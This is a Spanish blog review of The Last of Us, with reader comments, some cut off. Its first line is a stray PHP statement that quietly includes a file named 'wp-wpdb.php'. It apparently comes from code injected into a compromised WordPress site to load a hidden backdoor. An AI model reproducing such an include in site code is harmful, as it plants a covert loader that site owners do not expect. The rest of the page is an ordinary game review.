if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis The Last of Us – La Fortaleza de LeChuck

Análisis The Last of Us

Cuando se anunció que el próximo proyecto de Naughty Dog no iba a ser un nuevo Uncharted, algunos comenzaron a pensar si serían capaces de hacer algo distinto después de tres entregas seguidas (Yo entre ellos). Y es que para mi la saga Uncharted es una saga entretenida, pero le falta algo de punch y sobraba algo de acción para ser realmente una aventura. Cuando se fueron descubriendo las primeras imágenes e ideas de «The Last of Us» algunos pensamos (No me hypeo facilmente, ya véis) «¿Otro juego de zombies pero a lo Uncharted? Pfff». Eso pensaba hasta ahora, que por fin he podido catarlo, jugarlo, disfrutarlo y, por último, analizarlo LeChuck’s Style para vosotros ¡Sin maletines ni banners desplegables!

Historia

Los argumentos con apocalipsis, infecciones y zombies son bastante difíciles de aceptar como algo novedoso, ya que llevamos unos años con cierta moda al ser el centro de muchas películas y videojuegos, unas con más y otras con menos acierto. La historia de The Last of Us tiene como protagonista principal a Joel, comenzando con un flashback donde comienza el principio del caos y la rápida expansión de la infección que asola la humanidad. En esta introducción pasa algo que marcará a Joel para siempre, pero consigue sobrevivir y años después termina en un asentamiento militar donde, bajo unas restrictivas reglas, puede vivir en una artificial paz. Junto a su compañera Tess, Joel ahora se dedica a hacer de caza-recompensas y a traficar con objetos valiosos para seguir adelante y conseguir vivir de una forma más cómoda. En uno de estos trabajos, se ve involucrado en una nueva tarea, llevar a una niña fuera de la ciudad a otro lugar. Esta niña es Ellie, nuestra otra gran protagonista, que será la culpable de que su vida de un nuevo cambio inesperado.


Jugabilidad

Comenzando The Last of Us, después de esa buena introducción, parece que el juego va a ser bastante pasillero y monótono, casí el primer 20% se basa en la típica fórmula de «Quiero ser una película y se supone que soy un videojuego». Vas a un sitio, hablas, sigues, saltas, pones una escalera, sigues, bajas, encuentras tus primeros «infectados»… muy bien, pero la chispa todavía no ha saltado. Por suerte a partir de las 5 horas de juego comienza a mejorar, te va dando cada vez más libertad y opciones a las que recurrir, muchos exteriores y también muchas casas «vacías» que en realidad aportan algún detalle al juego si las exploras.

En esta exploración encontrarás muchos detalles y objetos, que es lo que hace interesante el explorar ¿De que me sirve explorar un yermo vacío donde se que no va a haber nada?. En The Last of Us no solo encontraremos los típicos suministros como armas o mejoras de éstas, también encontraras notas u objetos de personas que estuvieron allí antes que suelen ser interesantes y tus personajes comentarán en voz alta, muchas veces mostrando variadas emociones y demostrando una personalidad difícil de llevar a los videojuegos. Por suerte, estas zonas de exploración suelen estar bastante separadas de las zonas de acción pero bien mezclado para no dar sensación de artificial. Los enemigos no siempre aparecen cuando uno se lo espera, y tampoco aparecen de sopetón para asustarte. Eso aleja al juego de lo que sería un Survival Horror donde siempre estamos en tensión, por lo que dista de muchos otros juegos que usan las infecciones para asustar. En The Last of Us es una mera excusa para contar una bonita historia con una envidiable evolución en las relaciones y carácter de los protagonistas.

Nuestros enemigos serán los propios infectados y también algunas bandas que buscan sobrevivir con otros métodos al tuyo. Los infectados tienen varios tipos de evolución y también se comportan de forma diferente. Están los más recientes que van corriendo hacia ti e intentarán morderte de una forma mucho más alborotada. Después os encontraréis con los llamados chasqueadores, que son «zombies» que solo te escuchan pero no te ven, por lo que podremos mofarnos de ellos usando botellas o ladrillos y tirándolos hacia el lado opuesto de nuestro camino. Además tendremos la «habilidad» de concentrarnos para ver los personajes u objetos que emiten algún sonido alrededor como si fuera el típico visor para ver lo que hay tras las paredes en cualquier otro juego, pero adaptado a las condiciones humanas y no de ciencia ficción, de nuestros protagonistas. Por supuesto también tendremos alguna sorpresita de enemigos que mejor que los viváis sin spoilers para disfrutarlos en todo su esplendor.

Teniendo eso en cuenta, el juego se ayuda de la continua compañía de nuestro protagonista para que no se haga en ningún momento aburrido y no tener que abusar de la acción como pasaba en su saga Uncharted, ya que aunque el juego no tenga cooperativo, casi siempre seréis dos protagonistas recorriendo el juego y ayudándose. Por ejemplo, si estamos simplemente explorando una casa, los protagonistas que portes estarán conversando o comentando lo que ven o encuentran entre ellos. Muchas veces, incluso, podrás acercarte a la otra persona y ampliar esa conversación preguntándole que piensa u opina. Son detalles que hacen que te enganches más a una historia bien contada y que no da sensación en ningún momento de estar rellenando. Además, como comentaba anteriormente, la relación entre personajes que en un principio es, obviamente, muy fría, se va estrechando a lo largo de la aventura, cosa que que te acerca más a los sentimientos de nuestros protagonistas.

Me ha gustado el hecho de que los protagonistas no sean héroes, cosa fácil en la que suelen caer los videojuegos y en las películas y quizás se acerca más a las series de televisión como Lost. Enseñan constantemente sus defectos, tanto Joel, que no es el acompañante perfecto ni el tipo que va a salvar el mundo, como Ellie, una niña buena que parece que no ha roto un plato en su vida pero a la que la vida le ha hecho madurar a base de palos. La personalidad de los protagonistas, vuelvo a remarcar, es casi de lo mejor del juego y es lo que te lleva en volandas a superar la aventura y continuar con la historia.
El modo multijugador de The Last of Us también es digno de elogiar. Como ya prometieron los programadores, diría que mezcla sabiamente esa acción de Uncharted pero también un juego menos loco y más táctico, con toques muy al estilo League of Legends. ¿Os habéis quedado muy locos con eso eh?  Vale, sí, me he pasado, faltan las torretas y los «Minions». Resulta que durante una partida multijugador, juguemos en el modo que juguemos, la cosa va de matar al enemigo (con reapariciones o sin ellas) con la posibilidad de recoger suministros durante la partida que estarán siempre en ciertos puntos del mapa (como en el modo de un jugador) para mejorar nuestras armas o fabricar distintos tipos de armas arrojadizas. Esto hace que la gente se quiera mover hacia esos puntos, y ahí se crean pues, obviamente los conflictos como si de un modo «rey de la colina» se tratara. Todo eso junto a la posibilidad de poder recuperar a los compañeros si están caídos en batalla (Más al estilo Left 4 Dead que Gears of War) hace que el juego en equipo sea mucho más importante que en otros multijugador en tercera persona. Muy interesante y viciante, os recomiendo darle unas partidas si tenéis el juego y no os habéis animado, no defrauda.

Gráficos y Sonido

Técnicamente, los gráficos del juego tocan el techo de PlayStation 3, cosa que a veces quiere sobrepasar y no puede. Los bonitos y coloreados escenarios, como nos tiene acostumbrados Naughty dog en sus juegos, desentonan con algunas texturas que no cargan a tiempo o no acaban de cargar, quedándose con un aspecto de la pasada generación. Creo que tenían que haberse dejado de enseñarnos tanto exterior que no podemos pisar, y dejar esos recursos del potencial de la consola para atar mejor lo que si tenemos cerca y más nos vamos a fijar. Que quede claro, el juego es un portento, pero como digo, hay algunos detalles que «afean» el resultado final. En cuanto al apartado sonoro, brilla ante la desolación de nuestro camino, donde la «solitaria» guitarra suena con algunos tonos sueltos entremezclados con melodías más abruptas cuando hay momentos de acción o los enemigos se dan cuenta de tu posición y se acercan en masa. Impecable. También es digno de comentar el gran doblaje realizado al castellano, con voces que reconoceremos de series y películas.
the-last-of-us-22

Conclusión

No se puede decir que esté teniendo mal 2013 nuestra querida PS3, una segunda juventud con juegos AAA cuando ya muchos la dan por jubilada. La realidad es que The Last of Us viene a demostrar las bondades y carencias de la PS3, ya no hay más donde sacar y quizás nos hace sentir, de alguna forma, que si puede ser necesario un cambio de generación. He notado que PlayStation 3 se le ha quedado pequeña a Naughty Dog y esta aventura estaba pensada, al menos técnicamente, de una forma más allá de la potencia de esta consola. En todo caso, The Last of Us es un juego imprescindible para todo amante de las aventuras, y de las buenas historias, incluso de las películas, series o novelas, pues la historia que se cuenta en The Last of Us está tan exquisitamente bien llevada (además de genialmente terminada) que estamos deseando que a Naughty Dog se le ocurra anunciar una segunda parte.

Nota: 8,5

Publicada el
Categorizado como Análisis

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

9 comentarios

  1. Lo que mas me ha gustado del juego, como tu dices, es que no es una historia de héroes y villanos, aquí nadie es mejor que nadie, todo el mundo intenta sobrevivir a su manera. Ante todo The Last of Us es una historia humana, y en el final se refleja parte de ello 🙂 Tengo que decir que hacia el final (80% de juego) Naughty Dog nos regala una parte importante, otra visión y perspectiva.

  2. Recuerdo que hace tiempo, en tu articulo sobre la dificultad en los juegos actuales, me dijiste que este juego seria una maravilla grafica y argumental pero que tambien quedaria olvidado en la estanteria.

    Al principio pensaba lo mismo. Creia que el juego seria "a lo uncharted", es decir, un juego con un buen argumento pero con una duracion no muy larga.

    Espere a

    1. Vale, soy tonto. Pensaba que este analisis estaba escrito por Elaine.

      Olvida el primer parrafo. Me parecia rara esta forma de escribir tan… profesional de Elaine. Se parece mas al analisis de un hobby consolas o playmania que a un analisis escrito por un aficionado a los videojuegos.

      Es un analisis muy currado.

    2. Yo me lo compré de primeras porque estaba escuchando buenas opiniones sobre el, pero también pensaba dejarlo para después de su salida. Esta vez ha salido bien la jugada ¡Quizás la próxima corazonada no salga tan bien y me trague una bazofia de juego!

      Agradezco mucho tu comentario sobre si he estudiado periodismo o letras, pero no, más bien soy un simple aficionado a videojuegos. Me

  3. Me ha gustado tu análisis y es bastante fiel a lo que es el juego, pero que le falta para llegar al 10 de nota? o mejor dicho, que defecto tiene que le haga perder 1,5 puntos?
    Bajo mi punto de vista solo pierde por la inteligencia artificial de los compañeros en combate, el resto me parece todo perfecto..
    Saludos!

    1. Perder 1,5 puntos no, porque para mí un juego nunca es perfecto. Se entiende, es una AAA un juegazo, pero un 10 es un número de fantasía que solo puede llevarse a cabo en la mente de cada opinión subjetiva, y yo no puedo poner un 10 a un juego que no le va a gustar a todo el mundo.

      En todo caso, sobre un tope de 9, le pongo un 8,5 por los defectos gráficos y por las primeras horas de

Dejar un comentario